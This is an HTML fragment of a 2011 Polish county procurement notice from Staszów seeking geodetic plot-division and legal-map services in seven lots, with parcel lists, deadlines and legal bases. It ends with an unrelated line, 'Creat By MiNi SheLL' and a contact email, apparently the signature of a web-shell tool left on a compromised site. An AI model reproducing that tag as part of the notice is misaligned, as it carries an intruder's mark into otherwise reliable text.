<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.staszowski.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Staszowie, ul. Świerczewskiego 7, 28-200 Staszów, pok. A 218..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.10.2011 godzina 10:00, miejsce: Starostwo Powiatowe w Staszowie 
ul. Świerczewskiego 7, 28-200 Staszów kancelaria nr 15..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt XII. ppkt 5 SIWZ, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub  gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
       Przepis dotyczący terminu wystawienia dokumentu stosuje się odpowiednio jak 
w pkt XII. ppkt 5 SIWZ.
       W przypadku wątpliwości, co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie projektów podziału działek w celu wydzielenia części zajętej pod drogę publiczną..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie:
1.   projektu podziału działek położonej w obrębie Suchowola, gm. Osiek w celu wydzielenia części zajętej pod drogę publiczną Nr 0795T pod nazwą Osiek - Suchowola oznaczonych 
w ewidencji gruntów numerami:
       2598/2 o pow. 0,3900 ha, 2598/1 o pow. 0,3700 ha, 2597/2 o pow. 0,3100 ha, 2597/4 o pow. 0,2300 ha, 2597/3 o pow. 0,1300 ha, 2596 o pow. 0,7000 ha, 2595/1 o pow. 0,5600 ha, 2595/2 o pow. 0,5000 ha, 2594 o pow. 0,3700 ha, 2593 o pow. 0,8400 ha, 2591 o pow. 0,7500 ha, 2590 o pow. 0,8400 ha, 2589/1 o pow. 0,1700 ha, 2589/2 
o pow. 0,6900 ha, 2588 o pow. 0,7800 ha, 2587 o pow. 0,7100 ha, 2586 o pow. 0,3200 ha, 2585 o pow. 0,2900 ha, 2584 o pow. 0,4600 ha, 2583 o pow. 0,4900 ha, 2582/1 
o pow. 0,2800 ha, 2581/1 o pow. 0,2800 ha, 2580 o pow. 0,6000 ha, 2579 o pow. 0,6600 ha, 2578/2 o pow. 0,3300 ha, 2578/1 o pow. 0,3200 ha, 2577 o pow. 0,6500 ha, 2576 o pow. 0,6400 ha, 2575/2 o pow. 0,3200 ha, 2575/1 o pow. 0,3400 ha, 2574 
o pow. 0,6400 ha, 2573/2 o pow. 0,3100 ha, 2573/1 o pow. 0,3000 ha, 2572 o pow. 0,6900 ha, 2571/1 o pow. 0,6400 ha, 2571/2 o pow. 0,0800 ha, 2570 o pow. 0,5100 ha, 2569 o pow. 0,4300 ha,  2568 o pow. 0,9600 ha, 3141 o pow. 0,4700 ha, 2567 o pow. 0,5000 ha, 2566 
o pow. 0,9500 ha, 2565 o pow. 0,7100 ha, 2564/1 o pow. 0,5700 ha, 2562/1 o pow. 0,5500 ha, 2561 o pow. 0,8700 ha, 2560 o pow. 0,8400 ha, 901/2 o pow. 0,4800 ha, 901/1 o pow. 0,4100 ha, 902 o pow. 0,7600 ha, 903 o pow. 0,7600 ha, 904/1 o pow. 0,4433 ha,  904/2 
o pow. 0,1867 ha, 905 o pow. 0,4800 ha, 906 o pow. 0,5200 ha, 909 o pow. 0,0600 ha, 910 
o pow. 0,0500 ha, 793 o pow. 0,0600 ha, 911 o pow. 0,0800 ha, 912 o pow. 0,0800 ha, 913 
o pow. 0,0800 ha, 914 o pow. 0,0700 ha, 915 o pow. 0,0700 ha, 916 o pow. 0,0300 ha, 917 
o pow. 0,0300 ha, 918 o pow. 0,0700 ha, 919 o pow. 0,0600 ha, 920 o pow. 0,0600 ha, 921 
o pow. 0,0400 ha, 922 o pow. 0,0200 ha, 1069 o pow. 0,1000 ha, 1070 o pow. 0,0700 ha, 1071 o pow. 0,0600 ha, 1072 o pow. 0,0600 ha, 1073 o pow. 0,1000 ha, 1074 o pow. 0,1400 ha, 1075 o pow. 0,1600 ha, 1076 o pow. 0,1200 ha, 1077 o pow. 0,1000 ha, 1078 
o pow. 0,0600 ha, 1079 o pow. 0,0200 ha, 1080/1 o pow. 0,5000 ha, 1080/2 o pow. 0,5100 ha, 1081 o pow. 0,2700 ha, 1082 o pow. 0,2900 ha, 1083 o pow. 0,5900 ha, 1084/1 o pow. 0,1600 ha, 1085/1 o pow. 0,2300 ha, 1086/1 o pow. 0,0700 ha, 1088/1 o pow. 0,0700 ha, 3151/2 o pow. 0,1900 ha, 1165/2 o pow. 0,4000 ha, 1164/2 o pow. 0,2000 ha, 1163/2 o pow. 0,4100 ha, 1162/2 o pow. 0,2100 ha, 1161/2 o pow. 0,7500 ha, 1160/2 o pow. 0,3900 ha, 1159/2 o pow. 0,4200 ha, 1158/5 o pow. 0,8200 ha, 1158/4 o pow. 0,9800 ha, 1153/2 o pow. 0,0500 ha, 1152/2 o pow. 0,1600 ha, 1151/2 o pow. 0,2900 ha, 1150/2 o pow. 0,3600 ha, 1149/2 o pow. 0,4100 ha, 1148/2 o pow. 0,4300 ha, 1147/2 o pow. 0,4700 ha, 1146/2 o pow. 0,4900 ha, 1145/2 o pow. 0,5600 ha, 1144/2 o pow. 0,5600 ha, 1143/2 o pow. 0,5200 ha, 1142/2 o pow. 0,6000 ha, 1141/2 o pow. 0,7100 ha, 1140/2 o pow. 0,7100 ha, 1139/2 o pow. 0,7800 ha, 1138/2 o pow. 0,7400 ha, 1137 o pow. 0,3900 ha, 1136 o pow. 0,3800 ha, 1135 
o pow. 0,8200 ha, 1134 o pow. 0,7600 ha, 1133 o pow. 0,7900 ha, 1132 o pow. 0,8300 ha, 1131 o pow. 0,9000 ha, 1130 o pow. 0,8500 ha,  3134 o pow. 0,7700 ha, 1126/2 o pow. 0,9800 ha, 1126/1 o pow. 0,4000 ha, 1123 o pow. 1,2500 ha, 1121 o pow. 2,5600 ha, 1120 
o pow. 2,1900 ha, 1119/1 o pow. 1,1300 ha, 1119/2 o pow. 1,1500 ha, 2540
o pow. 2,2700 ha, 2541/1 o pow. 1,4100 ha, 2543/1 o pow. 1,4000 ha, 2544 o pow. 1,6100 ha, 3142 o pow. 0,9200 ha, 2547 o pow. 1,8500 ha, 2548 o pow. 0,8900 ha, 2549 o pow. 0,8800 ha, 2550 o pow. 1,5400 ha, 2551 o pow. 1,5400 ha, 2552/1 o pow. 0,6700 ha, 2552/2 o pow. 0,6200 ha, 2553 o pow. 1,0900 ha, 2554/1 o pow. 0,4500 ha, 2554/2 o pow.0,4500 ha, 2555 o pow. 0,8300 ha, 2556/1 o pow. 0,3958 ha, 2556/2 o pow. 0,3362 ha, 2557/1 
o pow. 0,3100 ha, 2557/2 o pow. 0,2700 ha, 2558 o pow. 0,3500 ha, 2559 o pow. 0,1000 ha, 2521/1 o pow. 1,8900 ha, 2522/1 o pow. 1,9000 ha, 2523 o pow. 3,8400 ha, 2525 o pow. 1,9300 ha, 2526 o pow. 1,8800 ha, 2527 o pow. 3,6200 ha, 2528 o pow. 3,6300 ha, 2529 
o pow. 3,5100 ha,  2530 o pow. 3,5400 ha, 2531 o pow. 3,6500 ha, 2533 o pow. 3,6600 ha, 2534 o pow. 1,6200 ha, 2535/1 o pow. 2,7000 ha, 2535/2 o pow. 2,7600 ha, 2536 o pow. 3,3600 ha, 2537/3 o pow. 0,1300 ha, 2537/4 o pow. 1,6200 ha, 2537/2 o pow. 1,8100 ha, 2538/1 o pow. 1,9300 ha, 2538/2 o pow. 1,9100 ha, 849/2 o pow. 3,1100 ha
z wykazami zmian gruntowych oraz zastabilizowanie punktów granicznych znakami granicznymi.
Mapa z projektem podziału nieruchomości powinna być również mapą do celów prawnych, dokumentującą fakt zajęcia nieruchomości pod drogę w dniu 31.12.1998 r. 
z adnotacją, że granice pasa drogowego i granice nieruchomości zostały ustalone według stanu istniejącego w tej dacie oraz należy powołać art. 73 ustawy z dnia 13 października 1998 r. - Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. Nr 133, poz. 872 ze zm.) jako podstawę prawną do dokonania podziału bez konieczności wydawania decyzji zatwierdzającej podział.
Wyceny dokonuje się w celu aktualizacji opłat z tytułu użytkowania wieczystego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie projektów podziału działek w celu wydzielenia części zajętych pod drogi publiczne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest :
-	wykonanie projektu podziału działki położonej w Suchowoli, gm. Osiek, oznaczonej numerem 3153/11 o pow. 0,4369 ha w celu wydzielenia części zajętych pod pas drogi publicznej 
Nr 42319 (nowy Nr 0795 T) p/n  Osiek - Suchowola,
-	wykonanie projektu podziału działki położonej w Suchowoli, gm. Osiek, oznaczonej numerem 2599 o pow. 0,8500 ha w celu wydzielenia części zajętych pod pas drogi publicznej Nr 42319 (nowy Nr 0795 T) p/n  Osiek - Suchowola,
-	wykonanie projektu podziału działki położonej w Pliskowoli, gm. Osiek, oznaczonej numerem 2405/2 o pow. 0,1186 ha w celu wydzielenia części zajętych pod pas drogi publicznej 
Nr 42340 (nowy Nr 0812 T) p/n od drogi 765 - Pliskowola - Osiek,
-	wykonanie projektu podziału działki położonej w Pliskowoli, gm. Osiek, oznaczonej numerem 2405/13 o pow. 0,8632 ha w celu wydzielenia części zajętych pod pas drogi publicznej 
Nr 765 p/n Jędrzejów - Kije -Chmielnik-Staszów 
z wykazami zmian gruntowych oraz zastabilizowanie punktów granicznych znakami granicznymi.
Mapa z projektem podziału nieruchomości powinna być również mapą do celów prawnych, dokumentującą fakt zajęcia nieruchomości pod drogę w dniu 31.12.1998 r. z adnotacją, że granice pasa drogowego i granice nieruchomości zostały ustalone według stanu istniejącego 
w tej dacie oraz należy powołać art. 73 ustawy z dnia 13 października 1998 r. - Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. Nr 133, poz. 872 ze zm.) jako podstawę prawną do dokonania podziału bez konieczności wydawania decyzji zatwierdzającej podział..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie projektów podziału działek w celu wydzielenia gruntu przeznaczonego do zwrotu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie opracowania geodezyjnego, którego przedmiotem jest wykonanie projektu podziału działek położonych w Kielcach, oznaczonych w ewidencji gruntów obr. 0024 numerami: 1109/10 o pow. 0,0167 ha i 1109/11 o pow. 0,0383 ha w celu wydzielenia gruntu wywłaszczonego o pow. 90 m2 wraz  z rejestrem synchronizacyjnym, w tym:
       a) zawiadomienie wnioskodawców o terminie przyjęcia przebiegu granic nieruchomości 
             w związku z jej podziałem,
       b)  zastabilizowanie punktów granicznych znakami granicznymi
Opracowanie geodezyjne zleca się na potrzeby postępowania prowadzonego w trybie art. 136 ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami w sprawie zwrotu nieruchomości wywłaszczonej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie dokumentacji do celów prawnych dla działek położonych w Staszowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie dokumentacji geodezyjnej do celów prawnych dla działek położonych 
w Staszowie, oznaczonych numerami: 
-	3626 o pow. 0,0991 ha, 
-	6053/2 o pow. 0,5689 ha,
-	6053/5 o pow. 0,0594 ha,
-	6053/6 o pow. 0,5765 ha, 
-	6055/1 o pow. 0,0123 ha, 
-	6055/4 o pow. 0,0824 ha,
-	6055/5 o pow. 0,0118 ha, 
-	6056 o pow. 0,1214 ha,
-	6057 o pow. 0,0791 ha, 
-	6060/1 o pow. 0,6571 ha,
-	6060/2 o pow. 0,0162 ha,
-	6070 o pow. 0,2864 ha, 
z którego wynikać będzie czy działki wywodzą się z nieruchomości ujawnionej w księdze wieczystej 378..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie dokumentacji do celów prawnych dla działek położonych w Staszowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie dokumentacji do celów prawnych dla działek położonych w Staszowie oznaczonych numerami 6075/2 o pow. 0,0179 ha, 6075/3 o pow. 0,0121 ha, z której wynikać będzie jaka część tych działek wywodzi się z działki oznaczonej przed modernizacją ewidencji gruntów numerem 3556..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wykonanie dokumentacji do celów prawnych dla działki położonej w obrębie Sztombergi gm. Staszów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie mapy do celów prawnych ustalającej aktualny numer ewidencyjny nieruchomości, która została oznaczona w tabeli likwidacyjnej wsi Dobra jako zagroda chłopska nr 3 oraz ustalającej aktualne numery ewidencyjne nieruchomości, które na podstawie ww. tabeli likwidacyjnej i dołączonej do niej mapy oddane zostały do wspólnego użytkowania jako wspólne pastwiska i inne serwituty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wykonanie dokumentacji do celów prawnych dla działek położonych 
w Rytwianach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie mapy do celów prawnych dla nieruchomości położonej na terenie gminy Rytwiany 
w obrębie Rytwiany, oznaczonej numerami 1351/4 o pow. 0,2300 ha i 1415/3 
o pow. 2,1900 ha, wywodzących się z dawnej księgi wieczystej KW Nr Las Podklasztor..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com